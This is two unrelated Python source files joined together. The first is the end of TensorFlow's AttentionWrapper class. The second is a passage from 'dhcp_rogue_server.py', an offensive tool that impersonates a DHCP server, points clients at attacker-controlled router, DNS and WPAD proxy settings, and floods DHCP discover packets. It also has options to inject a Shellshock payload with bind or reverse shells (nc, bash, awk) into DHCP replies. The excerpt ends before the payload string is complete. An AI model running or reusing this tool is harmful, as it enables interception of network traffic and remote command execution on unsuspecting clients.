name: Name to use when creating ops.
Raises:
TypeError: `attention_layer_size` is not None and (`attention_mechanism`
is a list but `attention_layer_size` is not; or vice versa).
ValueError: if `attention_layer_size` is not None, `attention_mechanism`
is a list, and its length does not match that of `attention_layer_size`.
"""
super(AttentionWrapper, self).__init__(name=name)
rnn_cell_impl.assert_like_rnncell("cell", cell)
if isinstance(attention_mechanism, (list, tuple)):
self._is_multi = True
attention_mechanisms = attention_mechanism
for attention_mechanism in attention_mechanisms:
if not isinstance(attention_mechanism, AttentionMechanism):
raise TypeError(
"attention_mechanism must contain only instances of "
"AttentionMechanism, saw type: %s"
% type(attention_mechanism).__name__)
else:
self._is_multi = False
if not isinstance(attention_mechanism, AttentionMechanism):
raise TypeError(
"attention_mechanism must be an AttentionMechanism or list of "
"multiple AttentionMechanism instances, saw type: %s"
% type(attention_mechanism).__name__)
attention_mechanisms = (attention_mechanism,)
if cell_input_fn is None:
cell_input_fn = (
lambda inputs, attention: array_ops.concat([inputs, attention], -1))
else:
if not callable(cell_input_fn):
raise TypeError(
"cell_input_fn must be callable, saw type: %s"
% type(cell_input_fn).__name__)
if attention_layer_size is not None:
attention_layer_sizes = tuple(
attention_layer_size
if isinstance(attention_layer_size, (list, tuple))
else (attention_layer_size,))
if len(attention_layer_sizes) != len(attention_mechanisms):
raise ValueError(
"If provided, attention_layer_size must contain exactly one "
"integer per attention_mechanism, saw: %d vs %d"
% (len(attention_layer_sizes), len(attention_mechanisms)))
self._attention_layers = tuple(
layers_core.Dense(
attention_layer_size,
name="attention_layer",
use_bias=False,
dtype=attention_mechanisms[i].dtype)
for i, attention_layer_size in enumerate(attention_layer_sizes))
self._attention_layer_size = sum(attention_layer_sizes)
else:
self._attention_layers = None
self._attention_layer_size = sum(
attention_mechanism.values.get_shape()[-1].value
for attention_mechanism in attention_mechanisms)
self._cell = cell
self._attention_mechanisms = attention_mechanisms
self._cell_input_fn = cell_input_fn
self._output_attention = output_attention
self._alignment_history = alignment_history
with ops.name_scope(name, "AttentionWrapperInit"):
if initial_cell_state is None:
self._initial_cell_state = None
else:
final_state_tensor = nest.flatten(initial_cell_state)[-1]
state_batch_size = (
final_state_tensor.shape[0].value
or array_ops.shape(final_state_tensor)[0])
error_message = (
"When constructing AttentionWrapper %s: " % self._base_name +
"Non-matching batch sizes between the memory "
"(encoder output) and initial_cell_state. Are you using "
"the BeamSearchDecoder? You may need to tile your initial state "
"via the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with ops.control_dependencies(
self._batch_size_checks(state_batch_size, error_message)):
self._initial_cell_state = nest.map_structure(
lambda s: array_ops.identity(s, name="check_initial_cell_state"),
initial_cell_state)
def _batch_size_checks(self, batch_size, error_message):
return [check_ops.assert_equal(batch_size,
attention_mechanism.batch_size,
message=error_message)
for attention_mechanism in self._attention_mechanisms]
def _item_or_tuple(self, seq):
"""Returns `seq` as tuple or the singular element.
Which is returned is determined by how the AttentionMechanism(s) were passed
to the constructor.
Args:
seq: A non-empty sequence of items or generator.
Returns:
Either the values in the sequence as a tuple if AttentionMechanism(s)
were passed to the constructor as a sequence or the singular element.
"""
t = tuple(seq)
if self._is_multi:
return t
else:
return t[0]
@property
def output_size(self):
if self._output_attention:
return self._attention_layer_size
else:
return self._cell.output_size
@property
def state_size(self):
"""The `state_size` property of `AttentionWrapper`.
Returns:
An `AttentionWrapperState` tuple containing shapes used by this object.
"""
return AttentionWrapperState(
cell_state=self._cell.state_size,
time=tensor_shape.TensorShape([]),
attention=self._attention_layer_size,
alignments=self._item_or_tuple(
a.alignments_size for a in self._attention_mechanisms),
attention_state=self._item_or_tuple(
a.state_size for a in self._attention_mechanisms),
alignment_history=self._item_or_tuple(
a.alignments_size if self._alignment_history else ()
for a in self._attention_mechanisms)) # sometimes a TensorArray
def zero_state(self, batch_size, dtype):
"""Return an initial (zero) state tuple for this `AttentionWrapper`.
**NOTE** Please see the initializer documentation for details of how
to call `zero_state` if using an `AttentionWrapper` with a
`BeamSearchDecoder`.
Args:
batch_size: `0D` integer tensor: the batch size.
dtype: The internal state data type.
Returns:
An `AttentionWrapperState` tuple containing zeroed out tensors and,
possibly, empty `TensorArray` objects.
Raises:
ValueError: (or, possibly at runtime, InvalidArgument), if
`batch_size` does not match the output size of the encoder passed
to the wrapper object at initialization time.
"""
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
if self._initial_cell_state is not None:
cell_state = self._initial_cell_state
else:
cell_state = self._cell.zero_state(batch_size, dtype)
error_message = (
"When calling zero_state of AttentionWrapper %s: " % self._base_name +
"Non-matching batch sizes between the memory "
"(encoder output) and the requested batch size. Are you using "
"the BeamSearchDecoder? If so, make sure your encoder output has "
"been tiled to beam_width via tf.contrib.seq2seq.tile_batch, and "
"the batch_size= argument passed to zero_state is "
"batch_size * beam_width.")
with ops.control_dependencies(
self._batch_size_checks(batch_size, error_message)):
cell_state = nest.map_structure(
lambda s: array_ops.identity(s, name="checked_cell_state"),
cell_state)
initial_alignments = [
attention_mechanism.initial_alignments(batch_size, dtype)
for attention_mechanism in self._attention_mechanisms]
return AttentionWrapperState(
cell_state=cell_state,
time=array_ops.zeros([], dtype=dtypes.int32),
attention=_zero_state_tensors(self._attention_layer_size, batch_size,
dtype),
alignments=self._item_or_tuple(initial_alignments),
attention_state=self._item_or_tuple(
attention_mechanism.initial_state(batch_size, dtype)
for attention_mechanism in self._attention_mechanisms),
alignment_history=self._item_or_tuple(
tensor_array_ops.TensorArray(
dtype,
size=0,
dynamic_size=True,
element_shape=alignment.shape)
if self._alignment_history else ()
for alignment in initial_alignments))
def call(self, inputs, state):
"""Perform a step of attention-wrapped RNN.
- Step 1: Mix the `inputs` and previous step's `attention` output via
`cell_input_fn`.
- Step 2: Call the wrapped `cell` with this input and its previous state.
- Step 3: Score the cell's output with `attention_mechanism`.
- Step 4: Calculate the alignments by passing the score through the
`normalizer`.
- Step 5: Calculate the context vector as the inner product between the
alignments and the attention_mechanism's values (memory).
- Step 6: Calculate the attention output by concatenating the cell output
and context through the attention layer (a linear layer with
`attention_layer_size` outputs).
Args:
inputs: (Possibly nested tuple of) Tensor, the input at this time step.
state: An instance of `AttentionWrapperState` containing
tensors from the previous time step.
Returns:
A tuple `(attention_or_cell_output, next_state)`, where:
- `attention_or_cell_output` depending on `output_attention`.
- `next_state` is an instance of `AttentionWrapperState`
containing the state calculated at this time step.
Raises:
TypeError: If `state` is not an instance of `AttentionWrapperState`.
"""
if not isinstance(state, AttentionWrapperState):
raise TypeError("Expected state to be instance of AttentionWrapperState. "
"Received type %s instead." % type(state))
# Step 1: Calculate the true inputs to the cell based on the
# previous attention value.
cell_inputs = self._cell_input_fn(inputs, state.attention)
cell_state = state.cell_state
cell_output, next_cell_state = self._cell(cell_inputs, cell_state)
cell_batch_size = (
cell_output.shape[0].value or array_ops.shape(cell_output)[0])
error_message = (
"When applying AttentionWrapper %s: " % self.name +
"Non-matching batch sizes between the memory "
"(encoder output) and the query (decoder output). Are you using "
"the BeamSearchDecoder? You may need to tile your memory input via "
"the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with ops.control_dependencies(
self._batch_size_checks(cell_batch_size, error_message)):
cell_output = array_ops.identity(
cell_output, name="checked_cell_output")
if self._is_multi:
previous_attention_state = state.attention_state
previous_alignment_history = state.alignment_history
else:
previous_attention_state = [state.attention_state]
previous_alignment_history = [state.alignment_history]
all_alignments = []
all_attentions = []
all_attention_states = []
maybe_all_histories = []
for i, attention_mechanism in enumerate(self._attention_mechanisms):
attention, alignments, next_attention_state = _compute_attention(
attention_mechanism, cell_output, previous_attention_state[i],
self._attention_layers[i] if self._attention_layers else None)
alignment_history = previous_alignment_history[i].write(
state.time, alignments) if self._alignment_history else ()
all_attention_states.append(next_attention_state)
all_alignments.append(alignments)
all_attentions.append(attention)
maybe_all_histories.append(alignment_history)
attention = array_ops.concat(all_attentions, 1)
next_state = AttentionWrapperState(
time=state.time + 1,
cell_state=next_cell_state,
attention=attention,
attention_state=self._item_or_tuple(all_attention_states),
alignments=self._item_or_tuple(all_alignments),
alignment_history=self._item_or_tuple(maybe_all_histories))
if self._output_attention:
return attention, next_state
else:
return cell_output, next_state
| apache-2.0 | -8,393,192,901,681,401,000 | 40.782821 | 94 | 0.670449 | false |
Vladimir-Ivanov-Git/raw-packet | Scripts/DHCP/dhcp_rogue_server.py | 1 | 47873 | #!/usr/bin/env python
# region Import
from sys import path
from os.path import dirname, abspath
project_root_path = dirname(dirname(dirname(abspath(__file__))))
utils_path = project_root_path + "/Utils/"
path.append(utils_path)
from base import Base
from network import Ethernet_raw, ARP_raw, IP_raw, UDP_raw, DHCP_raw
from tm import ThreadManager
from scanner import Scanner
from sys import exit
from argparse import ArgumentParser
from ipaddress import IPv4Address
from socket import socket, AF_PACKET, SOCK_RAW, htons
from os import errno, makedirs
from shutil import copyfile
from base64 import b64encode
from netaddr import IPAddress
from time import sleep
from random import randint
import subprocess as sub
# endregion
# region Check user, platform and create threads
Base = Base()
Scanner = Scanner()
Base.check_user()
Base.check_platform()
tm = ThreadManager(3)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='DHCP Rogue server')
parser.add_argument('-i', '--interface', help='Set interface name for send reply packets')
parser.add_argument('-f', '--first_offer_ip', type=str, help='Set first client ip for offering', default=None)
parser.add_argument('-l', '--last_offer_ip', type=str, help='Set last client ip for offering', default=None)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
parser.add_argument('-T', '--target_ip', type=str, help='Set client IP address with MAC in --target_mac', default=None)
parser.add_argument('-m', '--netmask', type=str, help='Set network mask', default=None)
parser.add_argument('--dhcp_mac', type=str, help='Set DHCP server MAC address, if not set use your MAC address', default=None)
parser.add_argument('--dhcp_ip', type=str, help='Set DHCP server IP address, if not set use your IP address', default=None)
parser.add_argument('--router', type=str, help='Set router IP address, if not set use your ip address', default=None)
parser.add_argument('--dns', type=str, help='Set DNS server IP address, if not set use your ip address', default=None)
parser.add_argument('--tftp', type=str, help='Set TFTP server IP address', default=None)
parser.add_argument('--wins', type=str, help='Set WINS server IP address', default=None)
parser.add_argument('--proxy', type=str, help='Set Proxy URL, example: 192.168.0.1:8080', default=None)
parser.add_argument('--domain', type=str, help='Set domain name for search, default=local', default="local")
parser.add_argument('--lease_time', type=int, help='Set lease time, default=172800', default=172800)
parser.add_argument('-s', '--send_discover', action='store_true',
help='Send DHCP discover packets in the background thread')
parser.add_argument('-r', '--discover_rand_mac', action='store_true',
help='Use random MAC address for source MAC address in DHCP discover packets')
parser.add_argument('-d', '--discover_delay', type=float,
help='Set delay between DHCP discover packets (default=0.5 sec.)', default=0.5)
parser.add_argument('-O', '--shellshock_option_code', type=int,
help='Set dhcp option code for inject shellshock payload, default=114', default=114)
parser.add_argument('-c', '--shellshock_command', type=str, help='Set shellshock command in DHCP client')
parser.add_argument('-b', '--bind_shell', action='store_true', help='Use awk bind tcp shell in DHCP client')
parser.add_argument('-p', '--bind_port', type=int, help='Set port for listen bind shell (default=1234)', default=1234)
parser.add_argument('-N', '--nc_reverse_shell', action='store_true', help='Use nc reverse tcp shell in DHCP client')
parser.add_argument('-E', '--nce_reverse_shell', action='store_true', help='Use nc -e reverse tcp shell in DHCP client')
parser.add_argument('-R', '--bash_reverse_shell', action='store_true', help='Use bash reverse tcp shell in DHCP client')
parser.add_argument('-e', '--reverse_port', type=int, help='Set port for listen bind shell (default=443)', default=443)
parser.add_argument('-n', '--without_network', action='store_true', help='Do not add network configure in payload')
parser.add_argument('-B', '--without_base64', action='store_true', help='Do not use base64 encode in payload')
parser.add_argument('--ip_path', type=str,
help='Set path to "ip" in shellshock payload, default = /bin/', default="/bin/")
parser.add_argument('--iface_name', type=str,
help='Set iface name in shellshock payload, default = eth0', default="eth0")
parser.add_argument('--broadcast_response', action='store_true', help='Send broadcast response')
parser.add_argument('--dnsop', action='store_true', help='Do not send DHCP OFFER packets')
parser.add_argument('--exit', action='store_true', help='Exit on success MiTM attack')
parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output')
args = parser.parse_args()
# endregion
# region Print banner if argument quit is not set
if not args.quiet:
Base.print_banner()
# endregion
# region Set global variables
eth = Ethernet_raw()
arp = ARP_raw()
ip = IP_raw()
udp = UDP_raw()
dhcp = DHCP_raw()
first_offer_ip_address = None
last_offer_ip_address = None
network_mask = None
target_mac_address = None
target_ip_address = None
dhcp_server_mac_address = None
dhcp_server_ip_address = None
router_ip_address = None
dns_server_ip_address = None
tftp_server_ip_address = None
wins_server_ip_address = None
wpad_url = None
dhcp_discover_packets_source_mac = None
free_ip_addresses = []
clients = {}
shellshock_url = None
domain = None
payload = None
SOCK = None
discover_sender_is_work = False
# endregion
# region Get your network settings
if args.interface is None:
Base.print_warning("Please set a network interface for sniffing ARP and DHCP requests ...")
current_network_interface = Base.netiface_selection(args.interface)
your_mac_address = Base.get_netiface_mac_address(current_network_interface)
if your_mac_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have MAC address!")
exit(1)
your_ip_address = Base.get_netiface_ip_address(current_network_interface)
if your_ip_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have IP address!")
exit(1)
your_network_mask = Base.get_netiface_netmask(current_network_interface)
if your_network_mask is None:
Base.print_error("Network interface: ", current_network_interface, " do not have network mask!")
exit(1)
if args.netmask is None:
network_mask = your_network_mask
else:
network_mask = args.netmask
# endregion
# region Create raw socket
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
# endregion
# region Get first and last IP address in your network
first_ip_address = str(IPv4Address(unicode(Base.get_netiface_first_ip(current_network_interface))) - 1)
last_ip_address = str(IPv4Address(unicode(Base.get_netiface_last_ip(current_network_interface))) + 1)
# endregion
# region Set target MAC and IP address, if target IP is not set - get first and last offer IP
if args.target_mac is not None:
target_mac_address = str(args.target_mac).lower()
# region Target IP is set
if args.target_ip is not None:
if args.target_mac is not None:
if not Base.ip_address_in_range(args.target_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-I, --target_ip`: ", args.target_ip,
"; target IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
target_ip_address = args.target_ip
else:
Base.print_error("Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)" +
", for target IP address: ", args.target_ip)
exit(1)
# Set default first offer IP and last offer IP
first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1)
last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1)
# endregion
# region Target IP is not set - get first and last offer IP
else:
# Check first offer IP address
if args.first_offer_ip is None:
first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1)
else:
if not Base.ip_address_in_range(args.first_offer_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-f, --first_offer_ip`: ", args.first_offer_ip,
"; first IP address in your network: ", first_ip_address)
exit(1)
else:
first_offer_ip_address = args.first_offer_ip
# Check last offer IP address
if args.last_offer_ip is None:
last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1)
else:
if not Base.ip_address_in_range(args.last_offer_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-l, --last_offer_ip`: ", args.last_offer_ip,
"; last IP address in your network: ", last_ip_address)
exit(1)
else:
last_offer_ip_address = args.last_offer_ip
# endregion
# endregion
# region Set DHCP sever MAC and IP address
if args.dhcp_mac is None:
dhcp_server_mac_address = your_mac_address
else:
dhcp_server_mac_address = args.dhcp_mac
if args.dhcp_ip is None:
dhcp_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.dhcp_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `--dhcp_ip`: ", args.dhcp_ip,
"; DHCP server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
dhcp_server_ip_address = args.dhcp_ip
# endregion
# region Set router, dns, tftp, wins IP address
# Set router IP address
if args.router is None:
router_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.router, first_ip_address, last_ip_address):
Base.print_error("Bad value `--router`: ", args.router,
"; Router IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
router_ip_address = args.router
# Set DNS server IP address
if args.dns is None:
dns_server_ip_address = your_ip_address
else:
if not Base.ip_address_validation(args.dns):
Base.print_error("Bad DNS server IP address in `--dns` parameter: ", args.dns)
exit(1)
else:
dns_server_ip_address = args.dns
# Set TFTP server IP address
if args.tftp is None:
tftp_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.tftp, first_ip_address, last_ip_address):
Base.print_error("Bad value `--tftp`: ", args.tftp,
"; TFTP server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
tftp_server_ip_address = args.tftp
# Set WINS server IP address
if args.wins is None:
wins_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.wins, first_ip_address, last_ip_address):
Base.print_error("Bad value `--wins`: ", args.tftp,
"; WINS server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
wins_server_ip_address = args.wins
# endregion
# region Set proxy
if args.proxy is not None:
# Set variables
wpad_url = "http://" + your_ip_address + "/wpad.dat"
apache2_sites_available_dir = "/etc/apache2/sites-available/"
apache2_sites_path = "/var/www/html/"
wpad_path = apache2_sites_path + "wpad/"
# Apache2 sites settings
default_site_file_name = "000-default.conf"
default_site_file = open(apache2_sites_available_dir + default_site_file_name, 'w')
default_site_file.write("<VirtualHost *:80>\n" +
"\tServerAdmin [email protected]\n" +
"\tDocumentRoot " + wpad_path + "\n" +
"\t<Directory " + wpad_path + ">\n" +
"\t\tOptions FollowSymLinks\n" +
"\t\tAllowOverride None\n" +
"\t\tOrder allow,deny\n" +
"\t\tAllow from all\n" +
"\t</Directory>\n" +
"</VirtualHost>\n")
default_site_file.close()
# Create dir with wpad.dat script
try:
makedirs(wpad_path)
except OSError:
Base.print_info("Path: ", wpad_path, " already exist")
except:
Base.print_error("Something else went wrong while trying to create path: ", wpad_path)
exit(1)
# Copy wpad.dat script
wpad_script_name = "wpad.dat"
wpad_script_src = utils_path + wpad_script_name
wpad_script_dst = wpad_path + wpad_script_name
copyfile(src=wpad_script_src, dst=wpad_script_dst)
# Read redirect script
with open(wpad_script_dst, 'r') as redirect_script:
content = redirect_script.read()
# Replace the Proxy URL
content = content.replace('proxy_url', args.proxy)
# Write redirect script
with open(wpad_script_dst, 'w') as redirect_script:
redirect_script.write(content)
# Restart Apache2 server
try:
Base.print_info("Restarting apache2 server ...")
sub.Popen(['service apache2 restart >/dev/null 2>&1'], shell=True)
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "service", " is not installed!")
exit(1)
else:
Base.print_error("Something went wrong while trying to run ", "`service apache2 restart`")
exit(2)
# Check apache2 is running
sleep(2)
apache2_pid = Base.get_process_pid("apache2")
if apache2_pid == -1:
Base.print_error("Apache2 server is not running!")
exit(1)
else:
Base.print_info("Apache2 server is running, PID: ", str(apache2_pid))
# endregion
# region Set Shellshock option code
if 255 < args.shellshock_option_code < 0:
Base.print_error("Bad value: ", args.shellshock_option_code,
"in DHCP option code! This value should be in the range from 1 to 254")
exit(1)
# endregion
# region Set search domain
domain = bytes(args.domain)
# endregion
# region General output
if not args.quiet:
Base.print_info("Network interface: ", current_network_interface)
Base.print_info("Your IP address: ", your_ip_address)
Base.print_info("Your MAC address: ", your_mac_address)
if target_mac_address is not None:
Base.print_info("Target MAC: ", target_mac_address)
# If target IP address is set print target IP, else print first and last offer IP
if target_ip_address is not None:
Base.print_info("Target IP: ", target_ip_address)
else:
Base.print_info("First offer IP: ", first_offer_ip_address)
Base.print_info("Last offer IP: ", last_offer_ip_address)
Base.print_info("DHCP server mac address: ", dhcp_server_mac_address)
Base.print_info("DHCP server ip address: ", dhcp_server_ip_address)
Base.print_info("Router IP address: ", router_ip_address)
Base.print_info("DNS server IP address: ", dns_server_ip_address)
Base.print_info("TFTP server IP address: ", tftp_server_ip_address)
if args.proxy is not None:
Base.print_info("Proxy url: ", args.proxy)
# endregion
# region Get free IP addresses in local network
def get_free_ip_addresses():
global Scanner
# Get all IP addresses in range from first to last offer IP address
current_ip_address = first_offer_ip_address
while IPv4Address(unicode(current_ip_address)) <= IPv4Address(unicode(last_offer_ip_address)):
free_ip_addresses.append(current_ip_address)
current_ip_address = str(IPv4Address(unicode(current_ip_address)) + 1)
Base.print_info("ARP scan on interface: ", current_network_interface, " is running ...")
localnet_ip_addresses = Scanner.find_ip_in_local_network(current_network_interface)
for ip_address in localnet_ip_addresses:
try:
free_ip_addresses.remove(ip_address)
except ValueError:
pass
# endregion
# region Add client info in global clients dictionary
def add_client_info_in_dictionary(client_mac_address, client_info, this_client_already_in_dictionary=False):
if this_client_already_in_dictionary:
clients[client_mac_address].update(client_info)
else:
clients[client_mac_address] = client_info
# endregion
# region Make DHCP offer packet
def make_dhcp_offer_packet(transaction_id, offer_ip, client_mac, destination_mac=None, destination_ip=None):
if destination_mac is None:
destination_mac = "ff:ff:ff:ff:ff:ff"
if destination_ip is None:
destination_ip = "255.255.255.255"
return dhcp.make_response_packet(source_mac=dhcp_server_mac_address,
destination_mac=destination_mac,
source_ip=dhcp_server_ip_address,
destination_ip=destination_ip,
transaction_id=transaction_id,
your_ip=offer_ip,
client_mac=client_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
dhcp_operation=2,
payload=None)
# endregion
# region Make DHCP ack packet
def make_dhcp_ack_packet(transaction_id, target_mac, target_ip, destination_mac=None, destination_ip=None):
if destination_mac is None:
destination_mac = "ff:ff:ff:ff:ff:ff"
if destination_ip is None:
destination_ip = "255.255.255.255"
return dhcp.make_response_packet(source_mac=dhcp_server_mac_address,
destination_mac=destination_mac,
source_ip=dhcp_server_ip_address,
destination_ip=destination_ip,
transaction_id=transaction_id,
your_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
dhcp_operation=5,
payload=shellshock_url,
proxy=bytes(wpad_url),
domain=domain,
tftp=tftp_server_ip_address,
wins=wins_server_ip_address,
payload_option_code=args.shellshock_option_code)
# endregion
# region Make DHCP nak packet
def make_dhcp_nak_packet(transaction_id, target_mac, target_ip, requested_ip):
return dhcp.make_nak_packet(source_mac=dhcp_server_mac_address,
destination_mac=target_mac,
source_ip=dhcp_server_ip_address,
destination_ip=requested_ip,
transaction_id=transaction_id,
your_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address)
# endregion
# def ack_sender():
# SOCK = socket(AF_PACKET, SOCK_RAW)
# SOCK.bind((current_network_interface, 0))
# ack_packet = make_dhcp_ack_packet(transaction_id_global, requested_ip_address)
# while True:
# SOCK.send(ack_packet)
# sleep(0.01)
# region Send DHCP discover packets
def discover_sender(number_of_packets=999999):
global discover_sender_is_work
discover_sender_is_work = True
packet_index = 0
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
if dhcp_discover_packets_source_mac != your_mac_address:
relay_agent_ip_address = Base.get_netiface_random_ip(current_network_interface)
while packet_index < number_of_packets:
try:
discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac,
client_mac=eth.get_random_mac(),
host_name=Base.make_random_string(8),
relay_ip=relay_agent_ip_address)
SOCK.send(discover_packet)
sleep(args.discover_delay)
except:
Base.print_error("Something went wrong when sending DHCP discover packets!")
packet_index += 1
else:
while packet_index < number_of_packets:
try:
discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac,
client_mac=eth.get_random_mac(),
host_name=Base.make_random_string(8),
relay_ip=your_ip_address)
SOCK.send(discover_packet)
sleep(args.discover_delay)
except:
Base.print_error("Something went wrong when sending DHCP discover packets!")
packet_index += 1
SOCK.close()
discover_sender_is_work = False
# endregion
# region Reply to DHCP and ARP requests
def reply(request):
# region Define global variables
global SOCK
global clients
global target_ip_address
global router_ip_address
global payload
global shellshock_url
global args
global discover_sender_is_work
# endregion
# region DHCP
if 'DHCP' in request.keys():
# region Get transaction id and client MAC address
transaction_id = request['BOOTP']['transaction-id']
client_mac_address = request['BOOTP']['client-mac-address']
# endregion
# region Check this client already in dict
client_already_in_dictionary = False
if client_mac_address in clients.keys():
client_already_in_dictionary = True
# endregion
# region DHCP DISCOVER
if request['DHCP'][53] == 1:
# region Print INFO message
Base.print_info("DHCP DISCOVER from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# endregion
# If parameter "Do not send DHCP OFFER packets" is not set
if not args.dnsop:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# If target IP address is set - offer IP = target IP
if target_ip_address is not None:
offer_ip_address = target_ip_address
# If target IP address is not set - offer IP = random IP from free IP addresses list
else:
random_index = randint(0, len(free_ip_addresses))
offer_ip_address = free_ip_addresses[random_index]
# Delete offer IP from free IP addresses list
del free_ip_addresses[random_index]
if args.broadcast_response:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address)
else:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address,
client_mac_address, offer_ip_address)
SOCK.send(offer_packet)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"transaction": transaction_id, "discover": True,
"offer_ip": offer_ip_address},
client_already_in_dictionary)
# Print INFO message
Base.print_info("DHCP OFFER to: ", client_mac_address, " offer IP: ", offer_ip_address)
# endregion
# region DHCP RELEASE
if request['DHCP'][53] == 7:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
Base.print_info("DHCP RELEASE from: ", client_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"client_ip": client_ip},
client_already_in_dictionary)
# print clients
# Add release client IP in free IP addresses list
if client_ip not in free_ip_addresses:
free_ip_addresses.append(client_ip)
else:
Base.print_info("DHCP RELEASE from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"release": True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP INFORM
if request['DHCP'][53] == 8:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
Base.print_info("DHCP INFORM from: ", client_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# If client IP in free IP addresses list delete this
if client_ip in free_ip_addresses:
free_ip_addresses.remove(client_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"client_ip": client_ip},
client_already_in_dictionary)
# print clients
else:
Base.print_info("DHCP INFORM from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"inform": True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP REQUEST
if request['DHCP'][53] == 3:
# region Set local variables
requested_ip = "0.0.0.0"
offer_ip = None
# endregion
# region Get requested IP
if 50 in request['DHCP'].keys():
requested_ip = str(request['DHCP'][50])
# endregion
# region Print info message
Base.print_info("DHCP REQUEST from: ", client_mac_address, " transaction id: ", hex(transaction_id),
" requested ip: ", requested_ip)
# endregion
# region Requested IP not in range from first offer IP to last offer IP
if not Base.ip_address_in_range(requested_ip, first_offer_ip_address, last_offer_ip_address):
Base.print_warning("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not in range: ", first_offer_ip_address + " - " + last_offer_ip_address)
# endregion
# region Requested IP in range from first offer IP to last offer IP
else:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# region Change client info in global clients dictionary
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"request": True, "requested_ip": requested_ip,
"transaction": transaction_id},
client_already_in_dictionary)
# Delete ARP mitm success keys in dictionary for this client
clients[client_mac_address].pop('client request his ip', None)
clients[client_mac_address].pop('client request router ip', None)
clients[client_mac_address].pop('client request dns ip', None)
# endregion
# region Get offer IP address
try:
offer_ip = clients[client_mac_address]["offer_ip"]
except KeyError:
pass
# endregion
# region This client already send DHCP DISCOVER and offer IP != requested IP
if offer_ip is not None and offer_ip != requested_ip:
# Print error message
Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not like offer IP: ", offer_ip)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address, offer_ip, requested_ip)
SOCK.send(nak_packet)
Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"mitm": "error: offer ip not like requested ip", "offer_ip": None},
client_already_in_dictionary)
# print clients
# endregion
# region Offer IP == requested IP or this is a first request from this client
else:
# region Target IP address is set and requested IP != target IP
if target_ip_address is not None and requested_ip != target_ip_address:
# Print error message
Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not like target IP: ", target_ip_address)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address,
target_ip_address, requested_ip)
SOCK.send(nak_packet)
Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"mitm": "error: target ip not like requested ip", "offer_ip": None,
"nak": True},
client_already_in_dictionary)
# endregion
# region Target IP address is set and requested IP == target IP or Target IP is not set
else:
# region Settings shellshock payload
# region Create payload
# Network settings command in target machine
net_settings = args.ip_path + "ip addr add " + requested_ip + "/" + \
